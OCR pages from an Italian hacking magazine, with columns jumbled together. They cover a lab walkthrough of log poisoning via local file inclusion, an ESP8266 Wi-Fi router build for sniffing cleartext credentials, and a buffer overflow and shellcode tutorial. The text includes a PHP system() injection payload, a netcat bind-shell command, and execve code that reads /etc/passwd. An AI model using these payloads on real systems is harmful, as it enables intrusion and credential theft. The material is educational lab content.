maggiore di comandi sul server $_GET[comando] restituirà la
Web, in maniera più rapida e meno stringa ls, coincidente per l’appunto
soggetta a errori (visto che, a ogni con il comando di shell di cui
comando, non corrisponderà più vogliamo richiedere l’esecuzione.
l’inclusione di codice PHP ad hoc Non ci resta, quindi, che effettuare
nel file auth.log). ancora una volta (l’ultima, per
la precisione) una connessione
IL CODICE PHP SSH al server Web, per iniettare
Per accedere ai parametri passati in auth.log il codice
dalla pagina tramite una richiesta
GET, PHP mette a disposizione <? system(“$_GET[comando]”);?>
figura #12
In questo modo iniettiamo in auth.log il codice PHP
necessario a eseguire il comando di shell passato
tramite il parametro GET denominato “comando”.
33 
 SICUREZZA
Se proviamo a eseguire netcat per aprire una shell
sul server Web, la pagina sembrerà non completare
il caricamento...
che, per l’appunto, esegue
il comando di shell passato
dall’utente tramite il parametro
GET denominato comando.
Avviamo una shell sulla VM
Pentester e digitiamo [figura #12]
# ssh <? system(“$_
GET[comando]”);?>@www.
labpentest.hj
quindi passiamo al browser
e inseriamo nella barra degli
indirizzi l’URL http://www.
labpentest.hj/mutillidae/index.
php?page=../../../var/log/auth.log&
comando=ls ottenendo il risultato
dell’esecuzione del comando
ls sulla directory di lavoro corrente
del server Web.
ESTENDERE I RISULTATI
Con quest’ultima incarnazione
del nostro attacco disponiamo di
uno strumento versatile e flessibile
per eseguire comandi di shell
sul server Web. Per esempio,
potremmo chiederci se esistano
ulteriori log da attaccare: è
sufficiente eseguire il comando
ls /var/log
che corrisponde alla visualizzazione
 34
figura #13
della pagina http://www.
labpentest.hj/mutillidae/index.
php?page=../../../var/log/ auth.
log&comando=ls /var/log.
Se poi tra questi file dovessimo
trovarne qualcuno meritevole
di ulteriori approfondimenti,
potremmo visionarlo passando
al parametro comando il valore
cat /var/log/nome_file_log
e reiterare questo procedimento
per ciascuno dei file da esaminare.
VOGLIO LA SHELL!
Rispetto alla nostra soluzione
iniziale, insomma, il ricorso
al parametro GET risulta
particolarmente immediato,
ma per contro necessita
di una richiesta HTTP ad hoc
per ogni comando di shell
che si vuole eseguire: nel corso
di un’indagine particolarmente
… ma per contro, avremo la possibilità di collegarci
alla shell sulla porta 3333 del server Web!
approfondita, caratterizzata
dall’esecuzione di molteplici
comandi, questa procedura
può, tuttavia, rivelarsi alquanto
macchinosa. In contesti come
quello delineato abbiamo
bisogno di poter interagire
in maniera tempestiva con
la macchina target: in altre parole,
abbiamo bisogno di una shell!
Non si tratta di un obiettivo
particolarmente complesso
da raggiungere, perché ormai
disponiamo di tutti gli strumenti
necessari… è infatti sufficiente
forzare il server a eseguire
il comando
nc -l -p 3333 -e /bin/sh
che, per l’appunto, pone una shell
in ascolto sulla porta 3333 del
server Web. A tal fine, è sufficiente
richiamare dal browser l’URL
[figura #13] http://www.labpentest.
hj/mutillidae/index.php?
page=../../../var/log/ auth.
log&comando=nc -l -p 3333 -e /bin/
sh, quindi avviare una shell sulla
VM Pentester e collegarci
comodamente alla porta 3333
del server Web. Il comando
da eseguire è
# nc www.labpentest.hj 3333
che, come possiamo notare
in [figura #14], ci fornisce accesso
a una shell (purtroppo non
privilegiata) sul server Web.
figura #14
HOW TO
sniffing Sniffare il traffico su rete Wi-Fi
Basta un SoC da pochi euro per catturare i pacchetti dati scambiati dai dispositivi vicini............. 36

buffer overflow Attacco tramite shellcode!

Diventare amministratori del sistema bucato sfruttando una vulnerabilità del codice...................... 42

steganografia L’ arte di nascondere i file dentro ai file

La tecnica per comunicare con altri hacker senza farci spiare dalla NSA...................................................48

log di windows Accessi al filesystem!

Grazie all’audit di Windows, ricostruiamo le attività di ogni utente sul filesystem del PC ................50
 HOW TO

Sniffare
il traffico
su r e t e W i - F i
Basta un SoC da pochi euro per creare una rete Wi-Fi capace di
catturare e analizzare i pacchetti dati scambiati dai dispositivi vicini

S
IN BREVE  ul numero 257 di HJ sono stati
riportati i passi necessari per
Ecco come trasformare
realizzare un honeypot facendo
una scheda che costa
pochi euro in un potente uso di un SoC programmabile
sniffer Wi-Fi. largamente impiegato nel campo
dell’IoT. Lo stesso hardware può essere
DIFFICOLTÀ
utilizzato per realizzare un ripetitore
Wi-Fi (Range Extender), all’atto pratico
un Router NAT. Un dispositivo di questo
tipo può essere
usato sia come
VERSATILITÀ
Ciò che ha reso incredibilmente versatili
i moduli ESP è il Wi-Fi integrato con il
supporto al protocollo IEEE 802.11 b/g/n
e un completo stack TCP-IP che lo rende
direttamente interfacciabile alla rete con
poco lavoro poiché supportato da vari
ambienti software. Vengono sviluppati
anche diversi firmware specifici e può
utilizzare alcuni linguaggi dedicati, come
l’IDE Arduino, il firmware Open Source

figura #1 estensore della

copertura della
con annesso SDK della NodeMCU
(www.nodemcu.com) e MicroPython
propria rete Wi-Fi, (https://micropython.org). All’elenco
sia come sistema vanno aggiunte altre soluzioni più o
per creare una rete meno note tra le quali spicca il firmware
Wi-Fi sicura e legale Open Source Tasmota (https://tasmota.
sulla quale fare i github.io/docs/) tipicamente utilizzato
propri esperimenti nel campo della domotica.
di hacking
compreso lo COSA È UN NAT ROUTER
sniffing del traffico. Le proprietà dell’ESP8266 sono tali
da permettergli di operare
Tutti i dati necessari contemporaneamente da stazione Wi-Fi
quando l’ESP funziona collegata a un AP (Access Point) creando
da Router NAT. al tempo stesso un nuovo segmento di

 36

rete con funzioni di softAP. In
sostanza, l’ESP funge da stazione
ripetente per l’AP (il gateway,
ovvero il router) ma da AP per i
sistemi che vogliono collegarsi sul
nuovo segmento di rete. Ma client,
sul nuovo segmento di rete, e
gateway come comunicano tra di
loro? Per ottenere questa funzione
l’ESP8266 deve agire da IP router,
scenario possibile poiché
implementa un completo stack
TCP/IP che, opportunamente
programmato, permette un
forwarding (inoltro) dei pacchetti
in entrambe le direzioni. In questo
scenario il problema risiede nel
fatto che i segmenti di rete tra
di loro “non si conoscono”, per
esempio il segmento di rete
192.168.1.x non è a conoscenza
della presenza di un segmento
di indirizzi 10.0.0.x e pertanto
occorrono delle entry opportune
all’interno delle routing tables
(tabelle di instradamento). Una tale
funzione è fondamentale quando
si vuole una configurazione senza
troppe problematiche, in termini
di tempo (quando ci si connette)
e tipologia di dispositivo utilizzato,
e.g. portatile, smartphone e moduli
IoT. Per tale motivo la corretta
funzione dell’ESP deve essere
quella di un router NAT (Network
Address Translation, letteralmente
traslazione degli indirizzi di rete)
affinché possa traslare gli indirizzi
IP e il numero di porta da una parte
all’altra dei segmenti di rete
fornendo ai computer sui diversi
segmenti l’illusione di essere
connessi su reti differenti. In questo
modo la rete creata dall’ESP potrà
essere vista come un segmento a
sé stante trasparente alle altre reti
come se fosse a tutti gli effetti un
“classico router casalingo”. Il
discorso di equivalenza rispetto a
un router si completa con le query
(richieste) DNS per la risoluzione
dei nomi di dominio. In un tipico
scenario i DNS vengono impostati
tramite l’interfaccia del proprio
router che opera come un proxy
DNS inoltrandole, per esempio,
verso l’IDNS (Internet Domain
Name Server) del proprio fornitore
di rete; il router diventa quindi un
intermediario. Poiché l’AP (gateway)
funge da proxy DNS, è facile intuire
come l’ESP8266 non deve far altro
che far passare queste richieste
in maniera trasparente verso l’AP.
figura #2
Cancellazione flash
seguita dal caricamento
del firmware.
SNIFFING
Come
potenziare
il Wi-Fi
Per i range extender esistono
soluzioni ad hoc commerciali
facilmente acquistabili, ma
è possibile realizzarne una
propria versione spendendo
pochi euro. In tale scenario la
scelta può ricadere su un
prodotto ideato da Espressif
Systems come l’ESP8266: un
SoC che integra un processore
RISC a 32bit e tutta una serie di
interfacce la cui spiegazione
esula dal seguente contesto ma
molto utilizzate dai maker per i
più disparati progetti.
CARICARE IL FIRMWARE
Volendo riportare una metodologia
valida per ogni sistema operativo,
la scelta non può che ricadere
su esptool scritto in Python
e sviluppato dalla Espressif –
oltremodo utilizzato come backend
dall’IDE Arduino quando si devono
caricare sketch per la famiglia ESP
– e i cui sorgenti vengono messi
a disposizione con licenza GPL.
Il software comunica tramite porta
USB con gli ESP previo utilizzo di un
bridge USB/UART. Per esempio:
la scheda NodeMCU ha già il bridge
integrato, un chip CP2102 di Silicon
Labs per il quale gli utenti Windows
e macOS dovranno installare
i driver dedicati, mentre gli utenti
GNU/Linux non dovranno fare
nulla poiché il kernel già
implementa il modulo necessario. Il
primo passo è assicurarsi che siano
installati Python 3.4 o superiore e il
tool pip (Pip Installs Packages o Pip
Installs Python, https://pypi.org/).
Terminata l’installazione il software
dovrebbe essere visibile dall’utente
nel terminale senza necessità di
37 
 HOW TO
GLOSSARIO figura #3
DI BASE

SOC
Acronimo di System
on Chip: indica
un intero sistema
(o quasi)
completamente
integrato in un chip.
Comprende cioè
RAM, Wi-Fi,
Bluetooth, sensori,
CPU, bus di
comunicazione
e molto altro. Sullo sfondo il browser con l’interfaccia grafica del router NAT ESP8266.

RISC
modifiche. Nei sistemi GNU/Linux verrà Tale messaggio indica che la scheda
Acronimo di Reduced
Instruction Set
installato in /home/nome_utente/. è connessa su /dev/ttyUSB0. Prima
Computer. Un tipo local/bin/ ed esptool.py -h fornirà di caricare il firmware è opportuno
di processore con set il significato delle opzioni associate cancellare tutto ciò che c’è nella
di istruzioni più al comando. Per scaricare il firmware memoria flash utilizzando il comando
uniforme e limitato precompilato che implementa
in grado di eseguire
la funzione di router è sufficiente esptool.py --chip esp8266 erase_
(relativamente) poche
istruzioni in impartire il comando flash
contemporanea.
Usato per compiti git clone https://github.com/ Non c’è necessità di specificare la porta
specifici dove martin-ger/esp_wifi_repeater.git poiché in genere la rilevazione
l’istruzione, è automatica [figura #2]. Al termine
semplificando al
A seguire digitate cd esp_wifi_repeater della cancellazione della flash si dovrà
massimo, viene letta,
decodificata, eseguita per entrare nella cartella clonata. caricare il firmware con
e il risultato riportato Dopo aver collegato la NodeMCU
in memoria. Si alla porta USB il comando dmesg esptool.py write_flash -fs 4MB -ff
contrappone ai dovrebbe riportare in output 80m -fm dio 0x00000
sistemi CISC (Complex un messaggio del tipo: firmware/0x00000.bin 0x02000
Instruction Set
firmware/0x02000.bin
Computer) in grado di
eseguire più cp210x converter now attached to
operazioni in una ttyUSB0 L’opzione -fs indica la dimensione della
singola istruzione.

GPIO
Acronimo di General
Purpose Input/
Output. Trattasi di
piedini fisici che il
chip/SoC mette a figura #4
disposizione del
programmatore per Topologia
usi e servizi generici. della rete
realizzata per
la stesura
dell’articolo.

 38

I sorgenti di esptool
Se volete utilizzare i sorgenti dal Git di Espressif è sufficiente il comando
git clone https://github.com/espressif/esptool.git per scaricarli in
locale seguito da cd esptool per entrare nella omonima cartella, quindi
procedere con pip install --user -e . (occhio al punto finale nel
comando, non è un errore ma indica la cartella corrente).
memoria (flash size), 4 MB, -ff
sta per flash frequency (80 MHz)
mentre -fm è l’acronimo di flash
mode dov’è indicata la DIO (Dual
I/O), la modalità di lettura della
memoria flash esterna (Dual Read
and Write Mode).
PRIMO COLLEGAMENTO
A questo punto la scheda
è programmata per svolgere
le funzioni di router NAT che di
default creerà il nuovo segmento di
rete 192.168.4.0/24 aperto (senza
password) con SSID di nome MyAP.
L’indirizzo per l’interfaccia grafica è
192.168.4.1 e al portatile collegato
è stato assegnato l’indirizzo
192.168.4.2 [figura #3]. Per
collegarsi al router di casa occorre
riportare SSID e Password della
rete nella sezione STA Settings
dell’interfaccia grafica, quindi
cliccare su Connect. Una volta
collegato un dispositivo alla “nuova
rete” per verificare che si riesca
ad “uscire”, quindi la possibilità
di navigare, è sufficiente un ping
8.8.8.8 (DNS Google) o verso
qualunque altro indirizzo IP
raggiungibile in Internet. È possibile
impostare, seppur in numero
limitato rispetto a un router
“regolare”, diversi parametri di rete.
Per queste operazioni è sufficiente
collegarsi via telnet all’ESP8266 con
il comando telnet 192.168.4.1
7777. Ottenuto il prompt, digitando
help e premendo Invio verranno
riportati tutti i comandi accettati.
Qualora si volesse cambiare
SNIFFING
sempre alla porta 7777 ma
all’indirizzo 10.0.1.1. Il comando
show config mostrerà l’attuale
configurazione, show stats le
statistiche e show route la tabella
di routing [figura #1] nella quale
il gateway (router) ha indirizzo
192.168.1.1 e la rete a valle
indirizzo poiché il predefinito si dell’ESP8266 indirizzo 10.0.1.0/24.
sovrappone a un router esistente, Si è detto che la rete di default
è sufficiente al prompt di telnet è aperta e si chiama MyAP. Si
impartire set network 10.0.1.0 che possono cambiare le impostazioni
“dirà” al router ESP8266 di creare il di default; per esempio per
segmento di rete 10.0.1.0/24. Prima impostare un altro nome della rete
di rendere effettive le modifiche (SSID) si può usare set ap_ssid
le si può visionare con show ReteLiberaNoPwd ricordandosi
per valutare se c’è qualcosa da sempre di salvare le impostazioni
modificare, quindi salvarle con e riavviare la scheda per renderle
save e renderle attive con reset. effettive. Alcuni parametri possono
Dopo il riavvio della scheda, per essere impostati anche attraverso
avere l’interfaccia Web dell’ESP l’interfaccia grafica. Va da sé come
router il browser va puntato al sia possibile ampliare la rete
nuovo indirizzo 10.0.1.1. Va da sé usando più schede per costruire
che ora la connessione telnet sarà diversi segmenti di rete. Gli indirizzi
figura #5
Identificare la
rete in chiaro.
Se il firmware non si carica
Nei sistemi GNU/Linux occorre assicurarsi che l’utente che dovrà
materialmente caricare via USB il firmware faccia parte del gruppo dialout
e, in alcune distribuzioni (e.g. Ubuntu), anche del gruppo tty, esattamente
come avviene per l’IDE Arduino. La verifica può essere effettuata avviando,
senza argomenti o opzioni aggiuntive, i comandi groups o id direttamente
dall’utente che dovrà caricare il firmware. Per aggiungere l’utente a un
gruppo basta usare il comando usermod -a -G dialout nome_utente
da impartirsi con le credenziali di root o anteponendo
a esso sudo per quelle distribuzioni che lo abilitano di default.
39 
 HOW TO
GLOSSARIO vengono assegnati automaticamente vede la cattura del traffico utilizzando
DI BASE dal DHCP. È possibile l’esecuzione di l’interfaccia wireless che opera
uno speed test utilizzando i classici test in monitor mode (wlo1 nel nostro caso).
UART online come https://misurainternet.it Si potrebbe provare, utilizzando
Universal per verificarne le performance. la suddetta rete in chiaro, a scoprire
Asynchronous le credenziali di un sito che opera
Receiver-Transmitter. ANALIZZARE IL TRAFFICO su connessione HTTP (non HTTPS).
Uno dei protocolli Il punto a cui siamo arrivati configura Ricordiamo che quanto descritto
seriali di
lo scenario visibile in [figura #4]. in queste pagine è solo a livello
comunicazione tanto
vecchio quanto Verifichiamo per questa rete le dimostrativo e didattico. Hacker Journal
semplice e largamente implicazioni riguardanti la sicurezza non si riterrà responsabile per qualsiasi
utilizzato nei poiché è aperta (in chiaro), sebbene sia azione che possa arrecare danno
microcontrollori. sempre possibile impostare il WPA2 emulando quanto riportato di seguito.
In quanto come opzione. Quali possibili
comunicazione
informazioni riusciamo a ricavare? Per FILTRATE I PACCHETTI
asincrona, quando
si vuole comunicare rispondere a questa domanda si farà Il primo passaggio è filtrare tutto ciò
via UART occorre uso del software Wireshark (www. che arriva e che parte dalla rete Wi-Fi
“concordare” wireshark.org). Lo scenario vede in chiaro appena creata. Come fare?
la velocità di catturare, con un portatile, il traffico Conosciamo il MAC address (Media
trasmissione (e.g.
di rete tra un dispositivo mobile (e.g. Access Control, indirizzo di 12 cifre
115.200 baud).
smartphone) che opera nella rete creata che identifica in maniera univoca una
BEACON FRAME dall’ESP8266. Essendo interessati alla scheda) del softAP; come visibile dalla
È un pacchetto che cattura dei pacchetti del protocollo [figura #1], è pari a 5e:cf:7f:6c:dd:a3 in
un dispositivo invia 802.11 allora si dovrà impostare esadecimale. Si può osservare in [figura
nell’etere per l’interfaccia wireless del portatile #5] un Beacon Frame corrispondente
annunciare la propria
in modalità monitor mode affinché si all’AP MAC riportato. Poiché nei dintorni
esistenza e
disponibilità alla possa “sniffare” tutto il traffico nell’etere. possono esserci molte altre reti, per
connessione. Contiene Tale impostazione è stata riportata più evitare di catturare traffico di non
diverse informazioni volte nei diversi numeri di HJ pertanto interesse che intaserebbe l’interfaccia
riguardanti le non verrà ripresentata in questo è opportuno inserire un filtro affinché
caratteristiche della contesto. Avviato Wireshark con i pacchetti catturati interessino tutto
rete che si appresta
le credenziali dell’amministratore (o e solo il traffico trasmesso o che abbia
a rendere disponibile
a chi vorrà collegarsi. anteponendo sudo per le distribuzioni come destinazione l’ESP. Per ottenere
che lo abilitano di default) il primo passo questo risultato si dovrà cliccare con il
IEEE 802.11
Rilasciato nel 1987,
identifica lo standard
delle reti wireless.
Le lettere b e g
indicano
rispettivamente,
per la frequenza
di 2,4 GHz,
una velocità di 11
Mbit/s e 54 Mbit/s.
La lettera n si riferisce
a una velocità
di 300 Mbit/s alla
figura #6
frequenza di 5 GHz. Filtrare i pacchetti per visualizzare
solo quelli che ci interessano,
cioè quelli da e per l’ESP.

 40
 SNIFFING
tasto destro su Transmitter
address del MAC del softAP e dal Ottimizzare la connessione
menu contestuale selezionare
Esistono topologie di rete che per costruzione originano ridondanze
Applica come filtro e dall’elenco
nei percorsi di comunicazione. Trattasi della topologia di rete mesh che
optare per Selezionati [figura #6]. all’atto pratico migliora la velocità di comunicazione poiché, effettuando
Verrà aggiunta nel rigo dei filtri la connessioni incrociate fra più elementi, permette di avere nodi diversi
stringa wlan.ta == 5e:cf:7f:6c:dd:a3. per il flusso dei dati, un traffico distribuito in maniera più uniforme
su ogni nodo e latenze ridotte, una migliore copertura e una maggiore
Dopo questa operazione verranno
stabilità del segnale. Una funzione integrata nel firmware dell’ESP8266
filtrati tutti i pacchetti trasmessi è la automesh attivabile da interfaccia grafica oppure con il comando
dall’ESP8266. In or logico (simbolo set automesh 1 via telnet. Una tale configurazione prevede almeno
della doppia pipe come nel un numero minimo di due schede.
linguaggio C, ||) va aggiunto anche
il filtro che permette di selezionare
tutti i pacchetti che hanno come
destinazione l’ESP8266. In definitiva
nel rigo dei filtri dovrà aversi la
stringa (sostituire il MAC con quello
del proprio device):

wlan.ta == 5e:cf:7f:6c:dd:a3
|| wlan.da == figura #7
5e:cf:7f:6c:dd:a3
Le reti in chiaro si dimostrano
ancora una volta un
A questo punto si può prendere colabrodo per i nostri dati,
lo smartphone, collegarsi alla rete difatti vengono usate come
in chiaro, quindi andare sul form esche, state attenti quando
di autenticazione di un sito per i pacchetti catturati utilizzando ne trovate una!
il quale conosciamo le credenziali da File la voce Salva come… e
e che utilizza il protocollo HTTP. assegnandogli un nome qualsiasi
Dopo aver immesso username (e.g. Test.pcapng). In questo modo di Wireshark selezionare Trova
e password effettuiamo il login; sarà possibile effettuare un’analisi un pacchetto (pulsante con lente
nel frattempo sulla schermata offline in un secondo momento d’ingrandimento come icona)
del portatile potremo vedere un caricando il file con sudo wireshark e dalla nuova sezione a comparsa
susseguirsi di pacchetti evidenziati -t Test.pcapmg. Operazione in selezionare Dettagli del pacchetto
con diversi colori. Effettuato il login realtà non necessaria poiché è (sezione a sinistra), lasciare Ridotti
si può interrompere la cattura possibile anche l’analisi a runtime o allargati nel menu a tendina
(icona seconda a destra con un (tempo di esecuzione). Qualunque centrale, Stringa nel menu di
quadrato rosso), quindi salvare sia la scelta adottata, dall’interfaccia destra e nel rigo di ricerca subito a
destra riportare, per esempio per
facilitare la ricerca, lo username
E se ho un ESP32? utilizzato per il sito. A questo punto,
cliccando sul pulsante Trova, dopo
Non cambiando l’obiettivo si può migliorare il sistema in alcune
caratteristiche utilizzando il “successore” del SoC ESP8266, l’ESP32. Come qualche attimo di ricerca Wireshark
il predecessore, anche l’ESP32 è stato realizzato in diverse versioni: si fermerà su un dato pacchetto nel
la più utilizzata è il modulo ESP-WROOM-32 e successivi rilasci, ognuno quale, come visibile in [figura #7]
caratterizzato da proprie specifiche non molto dissimili tra loro. L’ESP32 sarà possibile leggere sia l’IP del
oltre al Wi-Fi integrato con il supporto al protocollo IEEE 802.11 b/g/n
e a uno stack TCP-IP completo, include anche il pieno supporto alle
sito che le credenziali di accesso,
specifiche Bluetooth 4.2 e BLE (Bluetooth Low-Energy). a dimostrazione della pericolosità
delle reti in chiaro!

41 
 HOW TO
Attacco tramite shellcode!
QUARTA PA RT E
C’è chi riesce a sfruttare una vulnerabilità buffer overflow per
ottenere una shell di root e diventare così amministratore di sistema
S
IN BREVE  iamo così giunti al quarto
appuntamento dedicato ai
Studiamo la
buffer overflow. Nei numeri
condizione d’errore
di un programma precedenti di Hacker Journal
chiamata buffer si sono ottenuti due importanti risultati:
overflow per capire un programma vulnerabile affetto
come viene sfruttata da buffer overflow e righe di codice
dai pirati per compiere in C che ci permettono di aprire una
azioni malevole.
shell di root. Si pongono però ulteriori
DIFFICOLTÀ interrogativi. Come iniettare il codice
per l’apertura di una shell visto
che non è possibile passare le righe
del programma così come sono scritte?
Facciamo un passo avanti e cerchiamo
di dipanare questa questione.
figura #1
Contenuto del
file /etc/passwd.
 42
UN VELOCE RICHIAMO
Avere un programma vulnerabile
a un buffer overflow ma che non accetti
alcun parametro in ingresso non è di
nessuna utilità per un attaccante. Nelle
applicazioni reali i programmi, anche di
comune uso quotidiano, si interfacciano
con l’utente permettendogli in genere
di inserire un dato input, sia esso
un valore singolo oppure un gruppo
di valori anche misti e non
necessariamente solo numerici.
Nei precedenti appuntamenti abbiamo
visto un semplice programmino che
(sovra)scriveva il buffer accettando in
ingresso un certo numero di caratteri
che poi venivano copiati nel buffer.
Se il numero di caratteri era superiore
alla dimensione del buffer ecco che si
scatenava il buffer overflow, dovuto
sostanzialmente all’assenza di controlli
e nel nostro specifico caso indotto
dall’uso di funzioni non idonee come
strcpy(). Con il medesimo programma
sarebbe possibile, seppur in versione
semplificata e limitata, dimostrare come
ottenere una shell di root diventando
così amministratore di sistema grazie
alla vulnerabilità buffer overflow.
Si è utilizzato il condizionale poiché
prima della dimostrazione è necessario
comprendere almeno un altro
passaggio ossia, come ottenere lo
shellcode che poi dovrà essere passato
come input al programma vulnerabile.
GENERARE IL CODICE DA INIETTARE
Per realizzare un programma
è possibile seguire diverse strade in
funzione dell’applicazione che si vuole

figura #2
realizzare. Per esempio, utilizzare
un linguaggio ad alto livello come
Java, Python o Perl, oppure optare
per un linguaggio mid-level come
il C/C++. Infine si potrebbe
scegliere un linguaggio di basso
livello come l’Assembly o, ancora
più giù, usare gli opcode (codici in
formato esadecimale). Sebbene sia
possibile realizzare uno shellcode
utilizzando tutti i suddetti linguaggi,
occorre ricordare che nel nostro
obiettivo occorrerà poi passarlo
come input al programma
vulnerabile. Passare righe di codice
di linguaggi ad alto/medio livello
equivale a non passare nulla
poiché verrebbero viste come
sequenza di caratteri alla stregua
di tante A. Si immagini, per
esempio, la prima tipica riga di
codice C come #include <stdio.h>:
verrebbe passato prima il carattere
# seguito dalla lettera i, poi n e così
Il primo esempio di attacco
basato su buffer overflow fu il
Morris Worm che nel 1988 portò
al crash di più di 6.000 sistemi
BUFFER OVERFLOW
Disassemblaggio dell’eseguibile
previo uso del debugger GDB.
non esclusivamente – si utilizza
il linguaggio C;
• compilare il programma scritto
via. Se il numero di caratteri supera e verificarne la funzionalità;
la dimensione del buffer del • procedere al disassemblaggio
programma vulnerabile, il risultato e, passo facoltativo ma che
è un buffer overflow con la accresce le conoscenze, analizzare
conseguente chiusura del come il programma funzioni
programma a opera del kernel a livello di linguaggio Assembly;
con un errore di segmentation • facoltativo (almeno in una fase
fault (segnale SIGSEGV, SIGnal iniziale di apprendimento)
SEGmentation Violation) e tutto – attuare una procedura di
finisce lì. Se invece venisse passato ottimizzazione per ripulire il codice
l’opcode delle istruzioni, lo scenario Assembly da tutto ciò che non
cambierebbe: si può pensare occorre, al fine di ottenere un
di memorizzare questi codici, codice iniettabile più corto possibile;
che sono a tutti gli effetti delle • verificare che la funzione
istruzioni, direttamente nello stack. del programma Assembly sia
Tali istruzioni potrebbero essere equivalente a quella scritta
eseguite se si riuscisse a far saltare con un linguaggio di alto livello;
l’esecuzione del programma • estrarre gli opcode delle istruzioni
vulnerabile nelle locazioni per la creazione dello shellcode.
dove sono state
memorizzate. Per
ottenere gli opcode
si deve avere quanto
meno un sorgente
Assembly dal quale
ricavarli. Per
ottenerlo o si è un
minimo padroni
di questo linguaggio
oppure, almeno in
una fase iniziale, si
segue una logica per
passi che permette di
arrivare al risultato:
• scrivere la funzione
che si vuole ottenere
in un linguaggio di
alto/medio livello che
in genere si conosce.
Tipicamente – ma
figura #3
L’Assembly del
sorgente Elenco.c
ottenuto da GCC.
43 
 HOW TO
UN PO’ DI PRATICA
Di seguito vedremo un esempio
scritto in linguaggio C. L’obiettivo
è la lettura del contenuto del file
/etc/passwd – così chiamato
perché in esso una volta venivano
memorizzate le password – tramite
l’uso del programma cat, uno dei
comandi elementari in GNU/Linux
utilizzato per leggere un file
passato come argomento
e riportarne il contenuto sullo
standard output (man cat
per approfondimenti). Per ottenere
il risultato verrà utilizzata nel
sorgente C la chiamata di sistema

GLOSSARIO DI BASE
execve() il cui prototipo è:

int execve(const char

SHELLCODE *pathname, char *const argv[],
Con questo termine si indica un codice macchina in grado di mettere
char *const envp[])
a disposizione una shell una volta mandato in esecuzione. Non
necessariamente il codice di uno shellcode è tale da aprire sempre una
shell. A dispetto del nome, uno shellcode può realizzare qualsiasi funzione Digitate nel terminale man 2
si voglia. Esiste però una regola generale, in particolar modo per quegli execve per approfondimenti.
shellcode che devono sfruttare la vulnerabilità di un programma, Si digitino tutte le righe riportate
e consiste nell’ottenere un codice il più semplice e compatto possibile.
di seguito e si salvi il file con
Infatti in presenza, per esempio, di un’area vulnerabile di n byte si dovrà
considerare che tutto lo shellcode dovrà rientrare al più in quei n byte
un nome, per esempio Elenco.c.
che generalmente corrispondono ad alcune decine di byte!
#include <unistd.h>
OPCODE int main() {
È un codice operativo che dice al processore il tipo di operazione che char *args[3];
dovrà eseguire. Il codice, in funzione del tipo di operazione, è seguito
args[0] = “/bin/cat”;
da uno o più argomenti che istruiscono il processore sul da farsi.
Si può fare riferimento al sito http://ref.x86asm.net/ nel quale, per args[1] = “/etc/
esempio per i sistemi a x86_64 bit presi in considerazione in questo passwd”;
articolo (link coder64), si può vedere come a un codice 31 (in esadecimale) args[2] = NULL;
nella colonna po (primary opcode) corrisponda un’operazione di xor con execve(args[0], args,
relativi argomenti (colonne op1 e op2). NULL);
}
XOR FUNZIONE
Nota con il nome di or esclusivo, è una funzione logica la cui caratteristica
vede un’uscita 0 (livello logico basso) quando gli ingressi hanno il Il comando per la compilazione
medesimo livello logico, viceversa l’uscita è sempre pari a 1 (livello logico è gcc -static -g -o Elenco Elenco.c
alto). Per esempio, ipotizzando una Xor a 2 ingressi, se In1=0 e In2=0 laddove l’opzione -g aggiunge
allora Out=0. Lo stesso valore di uscita si ha per In1=1 e In2=1. La i simboli per il debug e -static
presenza di livelli differenti sugli ingressi come In1=0 e In2=1 vede l’uscita
ingloba nell’eseguibile tutte le
portarsi al livello logico alto (Out=1).
librerie necessarie al fine di evitare
CHIAMATA DI SISTEMA la presenza di linking dinamico per
Detta anche syscall, è l’unico meccanismo che hanno le applicazioni i motivi ricordati nel precedente
utente che girano in user space (comprese quelle che vengono avviate articolo. Il risultato vedrà
con i privilegi dell’amministratore, non si confondano i concetti di kernel
l’eseguibile Elenco la cui esecuzione
space e utente root) per richiedere un servizio. Infatti, poiché i programmi
che girano in user space non hanno la possibilità di accedere alle risorse
fornisce un output simile a quello
hardware (CPU, memoria, periferiche, ecc.), le chiamate di sistema sono visibile in [figura #1]; cioè l’elenco
il tramite di comunicazione tra user space e kernel space. All’atto di una delle righe contenute nel file /etc/
chiamata di sistema si ha il salvataggio dei registri, la commutazione da passwd. Si ha la funzione richiesta,
user space a kernel space, l’esecuzione del servizio richiesto, l’eventuale i primi due punti dell’elenco
lettura/scrittura di dati in memoria utente, la commutazione da kernel
precedente sono stati superati.
space a user space seguita dal ripristino dei registri e il proseguimento
dell’esecuzione del programma. Esempi di syscall sono open(), read(),
write(), close() per la gestione dei file, fork() e exit() per il controllo dei OTTENERE L’OPCODE
processi e execve() per il lancio di programmi. Il programma presenta due
funzioni, main() che esegue tutte

 44
 BUFFER OVERFLOW
le allocazioni in spazio utente per
il passaggio dei tre argomenti alla
figura #4
funzione execve() la quale, all’atto
della chiamata, può essere vista
con questi argomenti:

execve(“/bin/cat”, [“/bin/
cat”, “/etc/passwd”], NULL)

Tali argomenti devono essere

spostati dalla memoria in appositi
registri della CPU per poter
eseguire la funzione. Per un
sistema GNU/Linux a 64 bit occorre
fare riferimento alla tabella delle
syscall che si può trovare nel file
unistd_64.h nel percorso /usr/src/
kernel-x.yy.zz/arch/x86/include/
generated/uapi/asm/. Oppure,
senza installare i sorgenti del
kernel, le syscall sono riportate
in appositi siti, come https://bit.ly/
hj259_syscall, nei quali vengono
illustrati anche i registri coinvolti.
Per esempio, per eseguire la syscall
in questione, sys_execve, il
registro %rax (%eax per sistemi
a 32 bit) dovrà contenere il codice
che la identifica univocamente: 59
in decimale su macchine a 64 bit. In alto il lancio dell’eseguibile
I tre argomenti passati alla funzione assemblato, in basso il contenuto del file oggetto .o.
nel sorgente C dovranno essere
allocati rispettivamente nei registri il disassemblaggio alle righe scritte a mov 0x3b, %rax, ma la prima
%rdi, %rsi e %rdx (%ebc, %ecx in C. Provate a osservare, per soluzione è più efficiente poiché c’è
e %edx per sistemi a 32 bit). esempio, come viene passato meno codice macchina! In [figura
Ci si può rendere conto di questa in esadecimale il codice di #3] potete vedere l’Assembly
affermazione osservando riconoscimento univoco di una del file Elenco.s con grado di
la [figura #2] ottenuta dando in syscall al registro %rax: 0x3b, nello ottimizzazione -O2 e simboli
pasto al debugger GDB l’eseguibile specifico equivalente al numero 59 di debug, elenco ottenuto con
con il comando gdb -q Elenco, a cui fa seguito la chiamata con il comando gcc -S -fverbose-asm
quindi impartendo nell’ambiente l’istruzione syscall. Qualcuno -g -O2 Elenco.c -o Elenco.s.
del debugger i comandi disas /rs potrebbe notare un’apparente Gli output sono ricchi di
main e disas /rs execve per incongruenza poiché il registro interessanti spunti e suggerimenti
